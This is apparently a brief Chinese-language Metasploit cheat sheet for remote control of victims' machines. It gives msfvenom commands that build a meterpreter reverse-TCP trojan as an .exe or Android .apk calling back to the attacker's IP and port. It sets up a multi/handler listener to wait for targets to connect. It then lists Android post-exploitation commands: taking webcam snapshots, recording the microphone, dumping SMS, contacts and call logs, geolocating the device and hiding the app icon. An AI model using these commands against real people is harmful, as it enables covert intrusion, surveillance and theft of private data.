/*metasploit之远控*/
msfconsole //开启metasploit模块/*根据自己的IP生成一个木马*/msfvenom -p 系统/meterpreter/reverse_tcp LHOST=IP LPORT = 端口 R> 文件名.exe(安卓.apk)use expolit/multi/handler //开启模块
show options //查看参数设置
set LHOST 192.168.1.114 //这里的地址设置成我们刚才生成木马的IP地址
set LPORT 5555 //这里的端口设置成刚才我们生成木马所监听的端口
exploit //开始执行漏洞 开始监听,等待目标上线
/*安卓*/Stdapi: Webcam Commands=================================== webcam_list 列出网络摄像头 record_mic [?rek?rd]/记录/ 从默认麦克风录制音频为X秒 webcam_chat 开始视频聊天 webcam_snap 从指定的摄像头获取快照 webcam_stream -i 1 从指定的网络摄像头播放视频流[选择后摄像头]Android Commands
================= activity_start 从URI字符串启动Android活动 check_root 检查设备是否有根 dump_calllog 获取调用日志 dump_contacts 获取联系人列表 dump_sms 获取短信 geolocate 利用地理定位获取当前LAT wlan_geolocate 利用WLAN信息获取当前LAT hide_app_icon 从发射器隐藏应用程序图标 interval_collect 管理区间收集能力 send_sms 从目标会话发送短消息 set_audio_mode sqlite_query 从存储库查询SQLite数据库 wakelock 启用/禁用Wakelock